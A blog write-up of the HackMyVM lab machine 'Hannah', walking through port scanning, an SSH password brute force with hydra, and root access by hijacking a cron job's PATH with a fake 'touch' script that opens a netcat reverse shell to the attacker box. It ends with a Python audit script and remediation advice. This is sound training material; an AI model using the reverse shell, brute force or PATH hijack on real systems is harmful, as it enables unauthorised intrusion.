
[HMV] Hannah

0x00 Setup

Attacker IP: 172.16.1.25

Target IP: 172.16.1.235

0x01 Attack

Scan the target's open ports with Nmap

┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.235
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-20 09:47 CST
Nmap scan report for 172.16.1.235
Host is up (0.00052s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey: 
|   3072 5f1c78369905320982d3d5054c1475d1 (RSA)
|   256 0669ef979b34d7f3c79660d1a1ffd82c (ECDSA)
|_  256 853dda74b2684ea6f7e5f58540902e9a (ED25519)
80/tcp  open  http    nginx 1.18.0
| http-robots.txt: 1 disallowed entry 
|_/enlightenment
|_auth-owners: moksha
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
113/tcp open  ident?
|_auth-owners: root
MAC Address: 08:00:27:57:4A:D1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.33 seconds

Three ports were found: 22 (SSH), 80 (HTTP) and 113. Start with the web service.

Under construction

The site says it is under construction, so scan for hidden directories

┌──(root㉿Kali-VM)-[~]
└─# dirb http://172.16.1.235/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Mar 20 09:50:06 2023
URL_BASE: http://172.16.1.235/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://172.16.1.235/ ----
+ http://172.16.1.235/index.html (CODE:200|SIZE:19)                                                                                                                        
+ http://172.16.1.235/robots.txt (CODE:200|SIZE:25)                                                                                                                       
-----------------
END_TIME: Mon Mar 20 09:50:08 2023
DOWNLOADED: 4612 - FOUND: 2

robots.txt was found; open it

Disallow: /enlightenment

It reveals one path, but opening it returns a 404, so the web lead goes cold. Going back to the Nmap results, there is an auth-owners field; a quick Baidu search shows that this value is the username of the process listening on that port (Nmap gets it from the ident service on port 113). So try moksha as the username and brute-force SSH directly

┌──(root㉿Kali-VM)-[~]
└─# hydra -l moksha -P /usr/share/wordlists/rockyou.txt ssh://172.16.1.235:22 -t 6 -V -f -I
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

...

[22][ssh] host: 172.16.1.235   login: moksha   password: hannah
[STATUS] attack finished for 172.16.1.235 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

The password for user moksha is hannah; log in over SSH

[C:\~]$ ssh moksha@172.16.1.235


Connecting to 172.16.1.235:22...
Connection established.
To escape to local shell, press Ctrl+Alt+].

Linux hannah 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan  4 10:45:54 2023 from 192.168.1.51
moksha@hannah:~$ id
uid=1000(moksha) gid=1000(moksha) grupos=1000(moksha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

moksha@hannah:~$ whoami
moksha

After logging in, list all users that have a login shell

moksha@hannah:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
moksha:x:1000:1000:moksha,,,:/home/moksha:/bin/bash

Only root and moksha exist, so we need to escalate straight from moksha to root. Look for SUID binaries

moksha@hannah:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount

Nothing usable for privilege escalation here, so use pspy to watch for scheduled tasks

moksha@hannah:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

...

2023/03/20 03:35:24 CMD: UID=0     PID=1      | /sbin/init 
2023/03/20 03:36:01 CMD: UID=0     PID=22524  | /usr/sbin/CRON -f 
2023/03/20 03:36:01 CMD: UID=0     PID=22523  | /usr/sbin/cron -f 
2023/03/20 03:36:01 CMD: UID=0     PID=22525  | /usr/sbin/CRON -f 
2023/03/20 03:36:01 CMD: UID=0     PID=22526  | /usr/sbin/CRON -f 
2023/03/20 03:36:01 CMD: UID=0     PID=22527  | /bin/sh -c touch /tmp/enlIghtenment 

An odd touch command shows up every minute; check the cron configuration

moksha@hannah:/media$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/media:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
* * * * * root touch /tmp/enlIghtenment
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

/media is also in cron's PATH, listed before /bin and /usr/bin, and /media is readable and writable by us. Because the job calls touch by its bare name, cron resolves it by walking PATH in order, so try hijacking the touch command from /media

Create a file named touch in /media

#!/bin/bash
# Reverse shell back to the attacker box (listener on port 5004)
nc 172.16.1.25 5004 -e /bin/bash

Make it executable

chmod a+x ./touch

After a short wait, the reverse shell comes back

┌──(root㉿Kali-VM)-[~]
└─# nc -lvnp 5004
listening on [any] 5004 ...
connect to [172.16.1.25] from (UNKNOWN) [172.16.1.235] 60254
id
uid=0(root) gid=0(root) grupos=0(root)

whoami
root

Finally, get root.txt

ls -al ~
total 28
drwx------  3 root root 4096 ene  4 10:48 .
drwxr-xr-x 18 root root 4096 ene  4 10:47 ..
lrwxrwxrwx  1 root root    9 ene  4 10:45 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 abr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 ene  4 10:46 .local
-rw-r--r--  1 root root  161 jul  9  2019 .profile
-rw-------  1 root root   15 ene  4 10:48 root.txt
-rw-r--r--  1 root root   66 ene  4 10:47 .selected_editor

cat ~/root.txt
HMVHAPPYNY2023

0x02 Summary

This box used a scheduled task plus PATH (environment variable) hijacking
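The root cause above is a cron PATH that contains a world-writable directory ahead of the directories holding the real binaries, combined with jobs that call programs by bare name. The following audit script is an added example (not part of the original write-up and not a tool from the box): it parses a system crontab in the format shown above, extracts PATH, and for every bare command in every job walks PATH in cron's order, flagging any world-writable directory encountered before the directory where the binary actually lives. The sample crontab is constructed to mirror the one on the box, and the fake filesystem tree built by build_fake_tree is a constructed fixture so the check runs offline; pass fs_root="/" to run it against a real host.

```python
import os
import re
import shlex
import stat
import tempfile

# Constructed sample, modelled on the /etc/crontab shown in the write-up:
# /media sits in PATH ahead of /bin and /usr/bin, and the jobs use bare names.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/media:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
* * * * * root touch /tmp/enlIghtenment
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
"""

# Shell builtins never go through PATH lookup, so they cannot be hijacked this way.
BUILTINS = {"cd", "test", "[", "exit", "export", "true", "false", ":"}


def parse_crontab(text):
    """Return (path_dirs, jobs) for a system crontab; jobs are (user, command).
    @reboot-style lines (6 fields) are ignored for simplicity."""
    path_dirs, jobs = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        env = re.match(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$", line)
        if env:
            if env.group(1) == "PATH":
                path_dirs = env.group(2).strip('"').split(":")
            continue
        fields = line.split(None, 6)  # five time fields, user, rest is the command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return path_dirs, jobs


def command_names(command):
    """Bare program names a job command resolves via PATH (splits on &&, ||, ;, |)."""
    names = []
    for segment in re.split(r"&&|\|\||;|\|", command):
        segment = segment.strip().lstrip("(").strip()  # "( cd / && ... )" subshells
        try:
            tokens = shlex.split(segment)
        except ValueError:
            continue
        if not tokens:
            continue
        prog = tokens[0]
        # Skip explicit paths, builtins, env assignments and stray ')' tokens.
        if "/" in prog or prog in BUILTINS or not re.fullmatch(r"[\w.+-]+", prog):
            continue
        names.append(prog)
    return names


def is_world_writable(path):
    """True for an existing directory with the other-write bit (sticky or not:
    anyone can still create a new file there). None if the directory is absent."""
    try:
        st = os.stat(path)
    except (FileNotFoundError, NotADirectoryError):
        return None
    return stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def audit_cron_path(text, fs_root="/"):
    """Flag jobs whose bare command would be looked up in a world-writable PATH
    directory before reaching the directory that really holds the binary."""
    path_dirs, jobs = parse_crontab(text)
    findings, seen = [], set()
    for user, command in jobs:
        for prog in command_names(command):
            writable_before, resolved = [], None
            for d in path_dirs:  # same order the job's shell would use
                real_dir = os.path.join(fs_root, d.lstrip("/"))
                if is_world_writable(real_dir):
                    writable_before.append(d)
                candidate = os.path.join(real_dir, prog)
                if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
                    resolved = os.path.join(d, prog)
                    break  # lookup stops here; later writable dirs are harmless
            for d in writable_before:
                key = (user, prog, d)
                if key not in seen:
                    seen.add(key)
                    findings.append({"user": user, "command": prog,
                                     "writable_dir": d, "resolved": resolved})
    return findings


def build_fake_tree():
    """Constructed fixture: fake root where /media is world-writable and the real
    touch and run-parts live in /usr/bin, mirroring the box's layout."""
    root = tempfile.mkdtemp(prefix="cron-audit-")
    for d in ("usr/bin", "bin", "media"):
        os.makedirs(os.path.join(root, d))
        os.chmod(os.path.join(root, d), 0o755)
    for prog in ("touch", "run-parts"):
        p = os.path.join(root, "usr/bin", prog)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, 0o755)
    os.chmod(os.path.join(root, "media"), 0o777)
    return root


if __name__ == "__main__":
    for f in audit_cron_path(SAMPLE_CRONTAB, build_fake_tree()):
        print(f"{f['user']} job runs '{f['command']}': {f['writable_dir']} is "
              f"world-writable and precedes {f['resolved']}")
```

Note that the script reports run-parts as well as touch: the hourly and daily jobs are just as exposed as the one-minute job, they simply fire less often. The fix on the defender's side is to remove writable directories from cron's PATH (or make /media root-owned and 755) and to reference binaries by absolute path in job definitions.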

posted @ 2023-03-20 11:00 by 20206675